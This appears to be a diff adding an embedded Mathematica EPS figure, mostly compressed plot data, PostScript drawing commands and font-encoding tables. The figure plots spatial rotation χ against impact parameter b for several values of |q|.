+%WQ8lFojPfFWKWA8lBqgn9VoiYD1UKHTg6t/XZj1UOPfEleh2Puuhwp+xr7Y7 +%8FgPFcZ3VWs+0WA9On4/cmO2Lpf1UGFfYd85u9vZ90cV3ihKm5/VKiAPFdrc +%mxNm1yIgDxXqn71l/KpJQB4qPFUxy2FYo4A8VDhoZoDmw3oBeagwwSZpgGWd +%gDxU6HqWj8E1AvJQ4dV1Rw8PrhaQhwp/VxQufV4pII+O96i4M7mTKwTkoUK/ +%DTv6p5UJyEOFlY+G/LOpVEAeKtxxcYAbr0RAHh3vJZHL1gQWCchDhbc1upWP +%7nhfZjxUqO57Lfp3voA8VLjxznOlR56APFR474X0i2WugDxUuDpzSmJatoA8 +%dPHMBqeU41kC/D+QSguY +% "]]}, +% {GrayLevel[0], LineBox[CompressedData[" 
+%1:eJw113dczfsfB/BzTvPMzoispGGEzJtrv98qZFzRtSJZyYpCXDKvkK3749rE +%jcxKSEY5lAZpUlFJpb3XaY9fnPfn+0+P+n7P5/N5v57v8/30MV7lZr+Gx+Fw +%VFwO5+dPdg3+Y5N4+KVq5W79wOm5nofA0/+3/IGu7PdzEN594CYdqFY+73u4 +%bN7z6/Cs6XVygozdvwX6g/qU18VWKS9f+nndg0fWhkbCzVX0fCCk7Bv4qFZe +%pSyf9/MvwdBjiWr0ndBK+vxT6BD6xJg4VioF6X7ukwShMKbG1HA1p5LGewHZ +%++0H7btVoTR3PBOhGhQGO2rTps+3raDxX4P+DdstzWXlyltdn073ewOhltbC +%ZWfKab63kL88dvbVUeXK0b+uSEiV5ReeTy2j+d/B1ee6G5bvLFNGqgZ1zRAF +%O5xbi+t7ldF6YuBqovuk2eGlSvtfE8ZCg8fgHNflpbS+9xAbPnuZE7dUmev5 +%c8APwLkqCRD6ldB6P0LyuaUuJ2xKlFt+Ls89Hqwnx71NKCim9SdA2Lp9JzKP +%FCvVGkmg52Y18uHAYqonCYKa3nNmxBYpbX9NkAzXJAc2PlhXRPUlwy3jzsI4 +%3SLlz9kcz6RA5tkn7hF3C6neT2CYE3l5l22h8lc56Z8gZmfeAlVRAdX/GdxP +%PHIY712gNPq5nL6pUGIc6jhlQAHlkQq/dwwM1YvKV651+XmlQdEq8YQbq/Mp +%n3TQ+K3kdQM3X/lzNP3AdEjs7GfW7cYPyusLRINQ0jTph7Lh53CqL3Aq4suQ +%S5l5lN9XUOVmFPJ25Skn/xowA/zPXTQf2j2P8syA50NHfen+JFf5a3mHM6Fk +%pgKi7HIp3yxQZedNtizPUcZ//HllQYjzNff1R3Mo728wKLf4nINZjrLbrwVm +%w8fBR5b3P/Cd8s+GaTsvhotCs5W/hnP8Dk5X27ttrPhGHjkw0WnO10mm36ie +%HFgd86Jn4OIs8smBsOJpIT6nMqm+HDjyg38t+20GeeXCbW2vRc9UX6neXPC2 +%2u/FM/9KfrnA3eSv/W7pF6o/Dza+Oe7deiqdPPOg7MDX9TeUaZRHHvydM2hj +%YnUq+f6AKzGlzm7GqZTPD5iXYM7bN+8zef+AJ2KTqsoDnyivfPhkG+SQEpRC +%/vlwPim0b7/sZMovH2xsj1/OFyZTPxRAwve5vbnjkijPAugR4NA8LC6B+qMA +%rlVsSZ9lGk/5FsK9U3H3eZ5x1C+FIGlW/uuZ+J7yLuwab8GecNNY6p8iGO9+ +%4EzhjmjKvwgcbTSuPIt9R/1UBDGWv3lb9owkj2Lw06yb4r3uLXkUQ7NjBkdv +%k5I8iqFu3o8HI7XDyKMYcFl/j9arz8mjBB79+8a1bUQIeZTAyqiAxNa3weRR +%Am8MF036cuMheZRCt1PtYX7Pbyt9fnmUwoDjh5J/O3eNPEohzF0ybo3DGfIo +%A6ltcsLzU0vJowwKl/+5aPPxo6D2KINhTwt+t553GdQe5ZAoVsaeHn0L1B7l +%0G3btXHHpj4AtUc51C31i9g/LBjUHhVQNfNA46vwp6D2qADz/unbP9o9B7VH +%BdhscL75Kf8VqD0q4UyNM7zYqwS1RyW0FS7vcffkW1B7VEJvQWa3MY6RoPao +%gjEF5+18LaJA7VEFpx/vbjvOiQG1RxV8Xvjmo0NqLKg9qkF6LNBP+eAD1VMN +%a68EO1sd+ghqn2qwG7Dkej+nBKqvGvz17Zf0MkwCtVc1bPg2vL1EmEz1VsPY +%1QLfqNZkUPtVQ+VX5Qf/8hSqvwYMBla+cMn+BGrPGuAG7p1skfyZ8qiByg+T +%fpS9SwW1bw2sjO5Xe/tFGuVTA6/GTHA7F5QOau8aMJlqZ+3l/4XyqoXIurm3 +%V1//Cmr/Whi4fyLf5UIG5VcL1teK3Lz/yQT197MWjF2PZoeczKI8a+HJvVnv +%dY99A3V/1MLmiKySE0eyKd866FXzunrm4e+g7pc6GBXTuf+SVQ7lXQfc2kWB +%+pE5oO6fOrjbvqZ4ik0u5d/1/O4B3lrRudRPdRDwMbl9v20eedRDbIXy7am4 +%PPKoh8yLgZZWdj/Iox7e7L5w6+anH+RRD2aen4fdXJxPHvVQ5j55vEd2PnnU +%g2dzg26+cwF51EPtjUdT+OUF5KECYWhP5+JtheShAvel//O93lZIHl33VU4h +%zYeLyEMFE6Lt+hpJi8lDBa17/+gluVJMHioY1So/8W5ACXk0QIjDswKbJyXk +%0QBr37y56Iul5NEAW+L8xsQllJJHA7xvaX4Wv6yMPBogvnlQw7OKMvJoAGXd +%UdHefeXk0QivfDJmWEoryKMRhnlJL3z+r4I8GiHgjPNchzGV5NEI/w4LPZH+ +%oZI8GmGUym6X3Yoq8mgEh2aVLKKhijyaYE5q1jKT6dXk0QQlw8w+LztbTR5N +%IE57eXFUTjV5NMEGvVozT4sa8miCfO302fN315BHE3zof8Ip4n0NeTTB5rTT +%VyJ61JJHM3B2Xk+yX1dLHs2QluP7ZF9XX6o9mqGh3qvZll9HHs1gpJ138fGS +%OvJohhGpbSvCH9aRRzMknvxTd3NnHXm0AHSGXky0ryePFhgzufVOhn89ebTA +%FIXlf0da60H9vmwBB72ipsa5KvJogVjf7lLjOyryaIFkc9tGfoeKPFrBcOti +%8aMFDeTRCrevX3GxCGwgj1boF5dvtFmnkTxaISfwndOBlY3k0QomRgY/Noc1 +%kkcrHHlwr8aiRxN5tEF+5KrEDI8m8mgDX/25591TmsijDXQ0C3PLRzSTRxtE +%X4j0W+nTTB5t0DvJ1zClupk82mBZvHTxNPsW8mgD/rT3CyKftpBHOzxtfHd/ +%aY9W8miHovSG97y9reTRDkGizVMS81rJox3mbDuT/nZGG3m0w4qNx4wKgtvI +%ox0875Q9ntm7nTw6IPjI56aWw+3k0QFXt3OOltW0k0cHuKnyAu2Xd5BHBwQd +%uh5mkNBBHh0wanODxazJneTRAaNzd5xvDeokj04oWeJZcEnGQbVHJ7wr2nRE +%PJuDao9O+G+tcdRcbw6qPTqhbrGv65ZIDqo9OkF/4PUH2zhcVHt0wgl/XbcN +%k7lIxw8UJI05u2gvF9X1cBCl9scwnItqHw6aTkgy+62Di+r6OFh4PmCbFfJQ +%7cXBD/d77v3Li4e/ynXhYNbMBSPjY3io9uOg2bkZWavEGqh+P3DQ4KzK64/5 +%Gqj25ODMx3O27L+qgeo8OCjteBpiXqiBal8O8rYlr5w+UhPV+XAQ7jcpyvZq +%otqbg8YbRm0e+1ET1XlxUf/FX74j+2ih2p+Lnat6DO3cpEX5cfFl8FiLgLda +%qO4HLh4VGQ9ebqBNeXLxRVzfxQPctFHdH1z8ZJQ01uK9NuXLRV9pypgL/XVQ 
+%3S9dOXlM2Hf0kA7lzcVlwvVLpIU6qO4fLjYt9xi3c6Yu5c9FLc+P2U3Buqju +%Jy7+I9g47mofPnnwcNhL311hx/nkwcPoDudTfm188uBhvJ5BwPGtAvLg4d8O +%UWbPywXkwUOx8/LprzYKUd1/PBxfHFflXyUkDx6+CVq3a+guEXnw8O7Cjffu +%6orJg4cbfWIL4q6LyYOHt5Pfz5AF9SYPHnb7LBoSy+1DHjwMM3QOaV3chzx4 +%GGR6rLdhSB/y0MC/0/Iza7obkocGZk8JsRXuNyQPDVz1oXTUkkpD8tBANIve +%2telL3lo4Pht33pvKOpLHhp4v8+2qhEeRuShgTcW/jN/rE4/8tDAThPrP244 +%9iMPDZQs3DHHLqwfeWjg14FBwQJzY/LQQM9v376Y3jEmDw08qLI/vWKSCXlo +%otuIJIlzowl5aOLIwRn+O8pNyaPr/iGRbdX8/uShiQZZ3+dO6DGIPDTxYWd8 +%jCKjJ3loYknACkHIoO7koYmPex61bXymTx6aOH5MmMAxWUEemijWd/3DaKiC +%PDTR8L1NYa+HcvLQxChweatvIycPTVyy0ju6tlxGHpr4+ftTU/xPRh5aGP17 +%4m7jlTLy0MIBPoOzjg2UkYcWLo25u1G7XkoeWniJJ+x5LUpKHlo4u1D/wror +%UvLQwo+9dwYleEjJQwtv3g84NXWelDy0MP+CXbTbCCl5aGFa6qvF9TIpeWhh +%k7zVtVeZHnlooXsfk+jqED3y0EJN/81nZYf0yEMba819Xcct0CMPbXwdHjWF +%a65HHtoY9Ubv3ymdEvLQRp6Z7+176RLy0MaRL+6M7PtYQh7aaOx83Hn9aQl5 +%aGNV+czgTa4S8tDGluKpjzVnS8hDGz1qb+jqW0jIQxtNjZdpe+pJyKNrfQOu +%pPSvE5OHNmrsSQpsSxeThzb2EY/dXRYuJg8dLHGqds+7JSYPHdTP0f6ccFJM +%Hjro8yfY+G8Xk4cOLg/33Dx/uZg8dNBb9iQ2aYaYPHTQSDJimNRSTB466G/S +%mqpjLCYPHTTfGaJ5VywmDx107N1rZ2WLiDx0cGSywcfEYhF56GD47/XdbNNF +%5KGDzQ+99s+OFpGHLmbrTHzyKUREHrpYzdsd8e22iDx0cfSGqMmrzovIQxeH +%9c7hO3iLyEMXX05J7/F6p4g8dLG5V8m8UxtE5KGLi55effDOUYTq/VMXvxqp +%+jrYichDF2M8suNmW4nIQxc5OS79L1qKyEMX2wyyD04wF5GHLh75Ni1wmKGI +%PHQxooeBdJtMRB58/LtgtCNPW0QefMy//1dxVouQPPgYv2b31tau96nag4+v +%XgSecCoQkgcfl5ekGWhkCsmDj896xRgXJgnJg4+Dd52M1IoRkgcfT1gIuCvC +%heTBx3spQcl1T4TkwcdvB9Ymvr4vJA8+2rqeLgq7KSQPPl6/sci++qKQPARo +%5yX0/NNHSB4CXLpte1WRt5A8BHhO5BR2b7+QPAT4tv2R34W/hOQhwDcnF395 +%7Mb2DwFqu64c27iW7R8CDDgy+tnqFULyEODU0szHzYuF5CHA0nqN5KfzhOQh +%wPXNrYfPzxSShwCXcS1DL1sLyUOAbgdbPkVMFJKHAEuMv6tEY4TkIURJdIVo +%13AheQgx2DsmX9OceQix0Op+aJAJ8+iqqxjSPfswDyFO/2qdv6o78xCi6Vfj +%UBcp8xDioI8Hg70FzEOIs2dGit9pMg8hjjBJutirU0AeQuzu1/j2RLOAPLpy +%0fJw6V4vIA8h5o/au+ZFpYA8RJhitX7dthIBeYhwT8PVy9PyBeQhQutX872G +%f2f7uQgnjHs/aEQG289FuNEsbfTUVAF5iNDC/4iPe5KAPET4wcZD+1GcgDxE +%6DVP8kQjRkAeInx18bnTxggBeYhQ3zH0ZmG4gDxEqMed+JvHCwF5iNCy4mu/ +%biEC8hChysMuOPqRgDzEaFw9euvxhwLyEOPShA6bFXcF5CHGPtutA6fdEpCH +%GJ10Ok5MvCEgj6733mj9xdZXBeQhRpdHdpccLgrIQ4yTps4u3X9OQB5iHLiE +%0/+pj4A8xJguWu/SdJJ5iDFlgK/FzGPMo+s9G9Gt495h5iFGf4HLgx4HmYcE +%b1yO/ufcPuYhweDq0j2Gu5mHBL+9rjj55C/mIcFdaXXOCz2YhwR3xjsO0trC +%PCRYse+k6s0m5iFBt14Bhkc3MA8JDrsksF26lnlIcHPGWfPxzsxDgsbufZ+a +%rWQeEuSb/q+ppxPzkGBBt57+PZcyDwmKeesHmy1mHnq4qseQK+MWMA893JOn +%cXixPfPQw5PWAScP2jEPPbxzQFUQMpt56OH7IXOSamcwDz18azD56LjpzEMP +%df13NR+1YR56qCzjD86bwjz08EuMz1MbYB56aJt57a+gicxDD+tdtf82Hc88 +%9DDZ82xf39+ZhxT3h5z+x9SS1SPFpcX3W4JGMR8pxqc8gqkjWH1STH3s0TvP +%gnlJ0fSDzcIjQ1i9UozrnDxplDnzk6JzxSyrwgGsfik6ZZ22v2nGPKXoenXo +%59UmLA8pZo9qX2jRT0DnGSnaD18wqMOQ5SPFT52Gw1J7M28pHtedavekJ8tL +%irEjxuZeNBDQ/w9SfL3uqMehbiw/Kc77WuC4Q8H6QYobrrQI3GQsTynOsLm4 +%c5Me6w8pHtq1ymarmOUrxYhYTYO9QtYvUsw38Lx9is/yluKQXe9e+umw/pHi +%rPMh+W+0WP5SNJ46uyNPg/WTFDO+WFQJeMxDhqtj/XljOcxDhhkV3kUbOth5 +%RIaH95Q5/td1HlF7yPBskEonp4WdT2RoLbr+p0kznzxk6PV41sv1jXzykGFm +%wZX1z1R88pBh9/DWYzr1fPKQYa0lRC6r5ZOHDDfYTk57Xs2n75sMeZYPAntU +%8clDht3qvYP3VPDJQ4Z7jYOHFnbti2oPGbbt8Hr5ZymfPGRoar9hX1Qxnzxk +%2KNuz/cJRXzykKEiup/LswI+eciwMbNshmU+nzy66onIcnyexycPGRY6KEWQ +%yycPGTqvtDr64TufPGRd++W6IodsPnl0Pe+4Pqk8i08eMrx+uWz6oUw+echQ +%33SWX98Mdh6U4z1RfHb4Fz55yFFof7f7inTmIceTcycaaacxDznGrYvTfPSZ +%echxzb31lss+MQ85BuS2TpekMA85Jtne3hSRxDzkODzlwlLPROYhx/xdlncs +%E5hH13p8EuPqPjIPOe6LmjE+JI55yHGuR3CO5wfmIcd0T9v/Wb1nHnLsNcRv +%oSSWechxXuTV4qxo5iHHPSr90YFRzKPr+VkNd7zeMQ854qL+q5dEMg85rm41 +%0bWMYB5y5G7b1iF/yzzkeG7B/rJaJfPoWp972j9pr5mHHHdecVgWFs485Cg7 
+%fbrzVhjzkGPaC9l2n1fMQ4HXE9eH73vJPBRoNUU0x+0F81Dg6CVyyernzEOB +%X6sbZQ6hzEOBKxx5bfOeMQ8F7iqT1c4OYR4KfPhxnfGsp8yj69z3tDhx5hPm +%ocC+kdut/njMPBTIvdB9rX0w81DgmS9xdQ6PmIcCqw6dPLc6iHko0GtC761u +%gcxDgTNqHhzeG8A8FLjK23n86YfMQ4ELx0zk3HzAPLrGFy6c8ew+81DgvLuu +%ofH3mIcC1xTuVRXeZR4KNLvnNIB3l3kocOe3yQeN7jCPrvWIXGPBn3ko8Nje +%KcNX3mYeCjRasrvl0C3mocDl/LOj7vsxD31U8aOPp/zHx/8Dq98lgg== +% "]]}, +% {GrayLevel[0], LineBox[CompressedData[" +%1:eJw92XVYVNvXwPGhmWKKDhEMbEUM1Ktrid3YCihiKxa2qIAoBnaDioqg2Ipd +%iIFSiiAlId3dHe/8nLXf+ec+4zDnnL0++3tm5rlmyzfPWaXM4XCKVTic//2X +%PbQjVt3cYFYdulf78aRs1+3g/sXs10Yue34Ivlu9ilpRXRX6potX6ew3p6D3 +%mIPB81Kq6PULcCLT8uSYz1WhV3z/PeDzLT+b7vfY31+HuqG1aZyzVaFls//3 +%L/6w03WFS8Ju9v5AMHs28NatZVWhvOSALaN5QbCxuKlu5WR2vHtw9IJdTI9B +%VaG9HU5/qe/1ENLfKIen67HjP4Zpa0yFxp2VoYHydycHPIX7g7qt3xhTSecL +%hulPXSKe+1WGWv17PIfsgLEJRRsq6fwv4Ph7nrbhf5WhX+t7yc/wEj41GBkO +%4lfS9byGjdHN0aNTK0LnKE4Ih78b3xp5r4Ku7y04mTSt67e7IjTb9X8HfAfn +%qnfacSdV0PV+gKqCRz9zdCpCXf53eVtCYAVf9jMor5yu/yPsteqMdHheHqrQ +%+ASeE0MylDzLaT2f4Exd3RV/2/LQyf9O8Bly7xvs72taTuv7DEFfs/Y9LC8L +%/d/Z5KcEbtZSf+MPZbTeryAJG3d0t3dZ6L/lJH+F/FuvdvxYVEbrD4PBwxY3 +%yyzKQk3/dzldvoGp46os2/pSmsc3cJDdtNj5tTR0zer/Pb5D65m2Bu+zpTSf +%cICEdKubjqWh/zua9uNwcNjeZdT1/qU0rwiYe0IWeaq1JLThf4erj4CUA15n +%N0SW0PwiIWxa4f1xl0tCx/w7YBSYHjlkpLyqhOYZBQ4TT4z4OLgk9N/leUXD +%U6zf6sgpofn+gKRLQzM5McWhP3/8ewDf763D8avFNO+f0PbXeKXGuuJQnX8X +%GAPqNjONXYYV0/xjIM7JqiFWpTj03+EcfkGBXmhit7gi8oiFoea/nddeL6L1 +%xEJiqvYdX+ci8omFlFNZbh+ti2h9seD+ZKJ7sloRecXBDY/pq9N+F9J64+CY +%hQ8/+UYh+cWBe9SQ/z5vKKT1/4bvzt+KL44oJM/fwD9oc9tZvZDm8RsuRK8d +%1iu+gHzjgXMoKiPxRgHNJx6W+IU/2r2hgLzjYYX/8yz+iAKaVwKExV/tf0Kt +%gPwTYM3Er5eUf+fT/BLA5dZI8fLr+bQfEsFpc9cL79bn0zwTwbjlV1nHsHza +%H4mQvN5NNkoln+abBEe2XJ239Fce7ZckaIjUXbXvah7NOwlS2/5YHFqTR/sn +%GVotM57vs8qj+SfDHu1xHWs7c2k/JYNd9439JkXnkscfaEvj6Usu55LHH2j0 +%MkqOXp5LHn/A13995p4BueTxB56knjxq0JJDHilwf6nG5wffcsgjBRYdsftt +%cTaHPFLgs9vTyEsOOeSRCvYf9h4rtMgJPfPPIxU0jvNVR9dmk0cqSIzUc90+ +%ZpNHGvwYtS324bFs8kgD2xubT36fl00eaVBQ9X1/smk2eaSDU6uKb0JJFnmk +%Q0+uWuOHl1nkkQ53annfrnpkkcdfUDq+bZXTtCzy+AtN+3+46OtmkcdfaNlj +%cufG50zyyICzi7UHpCzIJI8M8I/aYZRcmkEeGZAuWWr52yODPDJB9PSkNFAn +%gzwywW30om5T7/8lj0wYZlh0+euYv+SRBWbFaR0Yn07ryYLgbNNLm9ekk08W +%TEm6vdK9NY3WlwXlPw3/XDydRl5ZcG7bss0e3dJovVlw1K/oVP/XqeSXBd+G +%PJ4cPTWV1p8NxVMKbC0zUsgzG1JOO0494pJC88iGiPx7NrdUU8g3Gy6Kxzje +%vvyH5pMN6a1DL13q84e8s0HT0UAyISSZ5pUDw/bsX58/K5n8cyBsQ6bvvJwk +%ml8OOK5v331mexL1mQOcHxDwQz2J5pkDHaOFWaE+ibQ/cmDtfjO/q30Sab65 +%cMBlgWzShwTaL7mwdUzLk6QZCTTvXNihrZ3aLzOe9k8ubN7/Jsp5SzzNPxf0 +%cnydzynF037KheHdIq9uOPebPPJgdYKpBXT7TR55cClx4tqE53HkkQf+eht/ +%TB0fRx55oPJSctAnIZY88uDswgHWL1bGkkceCPaa2B8u/kUeeTBw29fBNZq/ +%yCMfbv1NO2vTK4Y88iEvob/n6kk/ySMfVreUCKtW/SCPfNCf/eQU/1A0eeTD +%3uhlBma3osgjH8oadgmuh0aSRwHIek/vofQ3gjwKAB1GDMpqDiePArDy3cs7 +%oxtOHgWgE/9+/73B38mjAAbqlZU+nvmNPAogWtnSqff6MPIohNJC7Y/WXl/J +%oxCiFoS/HHTzC3kUgsEj9ef+7z6TRyGI+L0CTiZ8Io9CODOieOGZ9FDyKISc +%Xe5/F2t9JI8i6Dzq0aMJP5BHEfxYfyqqzuUdeRTB+T32vLRbb8ijCIKsH327 +%HfeKPIrAvjN+XDfOS/IogvXBJqKSAc/Jowhix63hdtgHk0cxOP83dMgXyRPy +%KAbPoaf7DVv7gDyK4b8dU5/afAwij2JY/evarHeSQPIohlvzB00dsOomeRSD +%o/vxzqz1vuRRArsTZaVzNM6RRwl8nvJshfYUL/IogafF2fnCn+voflkCHwev +%0zgVtQUUHiWwMtHiid64I6DwKIG6D0fX+krPg8KjFP7Embw9e+wKKDxKYdPQ +%8eMfKvmDwqMU5t6o5Ol+DgSFRykkcDpDAw7cBYVHKchOtK6WTHgICo9SeDKA +%Z/pK9SkoPMpAd+noUVGFwaDwKINIx7KNrtHPQeFRBpaW81ISnr4EhUcZpGWU +%ds649BoUHmWQ9KjT5sL+t6DwKIO+r3q1c1a9B4VHGTzLyf4weWYIKDzK4Rtu +%MRpoHQoKj3IYZZf3adnZT6DwKIe/qycen3LkMyg8yqFL1igfbbcvoPAoBxU/ +%G+G77V9B4SF//ip+KW4IA4VHBbgOM88UrvwGCo8KmOXzNPazw3dQeFTAgfqw 
+%9PL54aDwqICffYpCvGdFkEcFfM/ZZL17SiR5VMDxSV8Tt46PIo9KaEjs8mgG +%RJNHJej8mvV8+qgf5FEJu0KMcvyG/ySPSpjvn198dkgMeVRC+fvY86qDf5FH +%JVzYaFAxQD+WPKqgclvtm02XY2k9VTAtN6mbnl4c+VRB7dlrZXqX42h9VTB0 +%4fusgXq/yasKmhcmX313+Tf8W+7qKjgU+2D8Lv148quCHqoLQ375xoPi/iA/ +%vn1/tzFGCeRZBUPumZ9W9UugeVTBjA+LDfRME8m3ClaHR5697p9I86mCbDuz +%Oyu7J5F3FaTd/V1+PiiJ5lUNE23umRX0SSb/ajhuONbmiPx7jGJ+1eCghIa+ +%g//QfqgG3xNPHgte/6F5VkP4l+3hBaNSaH9Uw9NUx3Fln1JovtXwsNqzfMfE +%VNov8ufvT2k6/EileVfD/KcvLh6ck0b7pxoM9Mr366ek0fyr4aeT3ZZWx3Ta +%T9VQHBI1aW5hOnnUgFr40sdKm/+SRw28nhxwR6nxL3nUwKrOX3FH3DPIowaK +%DI/lzdLMJI8aWBIWl3jgbCbtvxq4Mi8x6I4wizxqYNyJn2qX52SRRw3EHxUM +%iricRR7y4wVd0xz5N4s8aiBn9Phbf82zyaMGVKpGiB+szSaPGkh92f3Yg8fZ +%5FEDvMXqFcV12eRRC5xxO1rmjMohj1r4e33qT65nDnnUwtnYX5dqInLIoxbm +%LbpiqinOJY9aGKqnKVi8MJc8aqFQ8mtp4fVc8qgFu6v+V98V5JJHLaRr3Twe +%PSCPPGrB4m3IQY1deeRRCy3LNqqvD80jj1pQ43HaLDXzyUN+PXfjK6xn55NH +%HTgdWbLK7ko+edSBpvY9i4jcfPKog3737p850L+APOrgS5vw0rZdBeRRB/7O +%2c+DPheQRx0E1AgdtQSF5FEHPl39e6csKCSPOkj/o4Qp/oXkUQfz/Fc/E5UX +%kkcd3LbS+3DRuog86kB0eELEskNF5FEHPd1X9F0SW0QedRAvOvr9rXExedRD +%2LvqyCXrismjHjbN21jR81UxedTDt4DYpctUSsijHsww7VyYbQl51EPkWusd +%ftdLyKMeYkK6C26WlZBHPdiEZvatGVlKHvWwIXj7voPHSsmjHob0DN22608p +%edRD/rzaO18tysijHjr87p5evKuMPOoh/rvznOnhZeTRABt87ilt0isnjwb4 +%41I+qHZNOXk0gJnJjx0Rb8rJowEe1RzrVcStII8GaN88qmKRfQV5NED+144/ +%Ux9VkEcDTOAZzdzWWUEeDfC8JHWj6pxK8miA99WDs7MDK8mjAQ7ZbpCNaKok +%jwYI/FRlGNejijwaADr2rI2ZVUUeDXBqit7Quj1V5NEIz5qrtNYEVpFHI1zx +%+vAzPKaKPBrhq75j8IHmKvJohIvaSeUruleTRyNYmxuZuc6qJo9GKFvNmRDq +%Wk0ejTAxqb3PpDvV5NEI+guqVIrjqsmjEZRTalzT26vJoxHMqkdpN/euIY9G +%2P22Z8qwBTXk0QidX3LLP3nWkEcTcLtnmxx+UkMeTbDQ4eqU1ek15NEEM/c5 +%V5zm1pJHE3iPW8ipH1ZLHk1g+ZRvfnJlLXk0gavLI32Hc7Xk0QQ8aC3a8KmW +%Pj+bIKET1j+vqCWPJlCa9PLGCJM68miCQwYTZqpOryOPJtBqfSZrknem8GiC +%GXYux0bcryOPJkgZ3e/E55Q68mgG7V+/9m3g1pNHM9TxdtusH1FPHs0Q5587 +%JmhdPXk0w6TdoweNvlJPHs2w+/Sjbs1R9eTRDKbJzq86WuvJoxlcZLOU5/Rv +%II9mUNpbujhnaQN5NMPZiMaAkDMN5NEMWZMHL6j40kAezZAU8mPIKvk+Ung0 +%Q2FHjptJr0byaIGVPXtv7WnfSB4tMMVr5FuXU43k0QL9HhWNNZY7KzxaYETl +%S2N+QyN5tMDYqEvR0/o0kUcLvBo/7savpU3k0QIbe8R+DDvfRB4t0PfdzB6N +%EU3k0QI7Fm5o9OpoIo8WCLFYOF8/Q4oKjxaIfXJO716pFBUeLaD5JF40q1mK +%Co8WkG36XifUkKHCoxVarG0PpWvLUOHRChmaHZN/mstQ4dEKCw+Z7Pw5SIYK +%j1b45N1rS9EYGSo8WsFhsINJlxkyVHi0wpqVnGtb7WWo8GiFQ5udshPWyVDh +%0QptGxdtddgtQ4VHK1SEZ5nUHpahwqMVat2dBPcuylDh0QqOlrsa9gTKUOEh +%//vpD6rXPZehwqMN7IOXzHX9IkOFRxvYuukdvhYnQ4VHG2SmvHEpzJKhwqMN +%rH4ccJxYJUOFRxv0O9/o+aNThgqPNjgwrO7ZZpE2KjzaYGHiEu3hptqo8GiD +%8+laa7oO1EaFRxu8v1jxujtoo8KjDUz6en6ZOUubPNogfH/ieD9HbfJoAyja +%0SLdok0ebVAx8uqpJx7a5NEO626UqK09q00e7VBuUpc46ZY2ebTDD2fJ7kXP +%tcmjHQb7LjA4FqZNHu1wYULt4cJEbfJoh9l/zu7dXqhNHu2g17Ww26BmbfJo +%h2U3eF15fB3yaAdlw/fnzU10yEP+3MZnxcqBOuTRDk3LqnwSx+qQRzvMeZw4 +%fc88HfLogEQ3t6Xz1uiQRwcsueMhXemqQx4dMNxNsvjxSR3y6ICSEaeDevvr +%kEcHWOxy6Z33Qoc8OqBVvfJBSoQOeXTA/uH3tsn+6pBHB+ztlr/0WLUOeXRA +%26WGmxPUdcmjA5Tm9soZY6RLHh3gZDq2+PAgXfLogFmrHs/Qm6hLHh1gddNA +%udFelzw64YptnorJVl3y6IQ+1UOWXTuqSx6dsPH4VgOXG7rk0QkhLuU9/F7p +%kkcnpFefi+kVo0senaAzwfqdYYEueXSC2q4wvmOHLnl0wpi/Wp56enrk0Qmn +%BY5lYwbpkYf8+ZGlvIQpeuTRCcsObXuXukKPPDpBd9vgCkc3PfLg4L4bhfdd +%fPVoPRz8kHxCvf2FHvlwMPY294xxnB6tj4NuEw8e+16uR14cNEy2tdTh69N6 +%Odir4Ty3vZc++XEw7WTKxzuT9Gn9HDR+YN2larU+eXIwtCxGWH1Yn+bBwQil +%P88ig/RR8XuGg9OcvVLXRurTfDiof23AqOJSffLmYPLNgPEzRQY0Lw4K04Xd +%Aq0MUPH9gYOcZuONnYsMaH4cDBKHa69wN6D9wMFxyz28iu8Y0Dw5uGLtg+sn +%fhnQ/uDgn54R8TubDWi+HDzQ2NF6s7sh7RcOWnIe2JrONqR5c1DdL+Zoi5sh +%7R8Obgy4u6zbY0OaPwffzEk79iPDkPYTB20M1B8ki43IQwknfM4Zaz3eiDyU +%8HAT72L8biPyUEL19xdFux8bkYcSbsxtHPktz4g8lLDzmajFxMiYPJQwymRD 
+% [Embedded Mathematica EPS figure data omitted: binary CompressedData
+% blocks, PostScript path/tick-drawing commands, and font-embedding code
+% (Times-Roman-MISO, Mathematica1) for a single plot.]
+% Recoverable figure information:
+%   Frame labels: x = "Impact parameter, b"; y = "Spatial rotation, χ"
+%   Curve annotations: |q| = 0.02, |q| = 0.05, |q| = 0.07, |q| = 0.1
+%   y-axis ticks: 0, π, 2π, 3π, 4π; x-axis ticks: 0 through 5
+dup 137/Cross put +dup 138/DblEqual put +dup 139/Grave put +dup 140/Acute put +dup 141/DoubleAcute put +dup 142/OverTilde put +dup 143/OverBar put +dup 144/DblUpDownArrow put +dup 145/DblUpExtens1 put +dup 146/DblLongLArrow put +dup 147/DblExtens put +dup 148/DblLongRArrow put +dup 149/DblLRArrow2 put +dup 150/DblLongLRArrow put +dup 151/UpDownArrow put +dup 152/LongLArrow put +dup 153/LongRArrow put +dup 154/LongLRArrow put +dup 155/ColonEqual put +dup 156/Diamond2 put +dup 157/NotSquareSprsetEqual put +dup 158/AtSign put +dup 159/Solidmedsqr put +dup 160/OverDot put +dup 161/CurlyCapUpsilon put +dup 162/Prime put +dup 163/LessEqual put +dup 164/Fraction put +dup 165/Infinity put +dup 166/RuleDelayed put +dup 167/ClubSuit put +dup 168/DiamondSuit put +dup 169/HeartSuit put +dup 170/SpadeSuit put +dup 171/LRArrow put +dup 172/LArrow put +dup 173/UpArrow put +dup 174/RArrow put +dup 175/DownArrow put +dup 176/Degree put +dup 177/PlusMinus put +dup 178/DoublePrime put +dup 179/GreaterEqual put +dup 180/Multiply put +dup 181/Proportional put +dup 182/PartialDiff put +dup 183/Bullet put +dup 184/Divide put +dup 185/NotEqual put +dup 186/Equivalence put +dup 187/Approxequal put +dup 188/Ellipsis put +dup 189/ArrowVertEx put +dup 190/ArrowHorizEx put +dup 191/CarriageReturn put +dup 192/Aleph put +dup 193/IFraktur put +dup 194/RFraktur put +dup 195/Weierstrass put +dup 196/CircleMultiply put +dup 197/CirclePlus put +dup 198/EmptySet put +dup 199/Union put +dup 200/Intersection put +dup 201/ProperSuperset put +dup 202/NbSpace put +dup 203/NotSubset put +dup 204/ProperSubset put +dup 205/ReflexSubset put +dup 206/Element put +dup 207/NotElement put +dup 208/Angle put +dup 209/Gradient put +dup 210/RegTM put +dup 211/Copyright put +dup 212/TM put +dup 213/Product put +dup 214/Radical put +dup 215/DotMath put +dup 216/LogicalNot put +dup 217/Wedge put +dup 218/Vee put +dup 219/DblLRArrow put +dup 220/DblLArrow put +dup 221/DblUpArrow put +dup 222/DblRArrow put +dup 223/DblDownArrow put +dup 224/Lozenge put +dup 225/LAngle put +dup 226/Diffd put +dup 227/Expe put +dup 228/Imagi put +dup 229/Sum put +dup 230/LParenTop put +dup 231/LParenEx put +dup 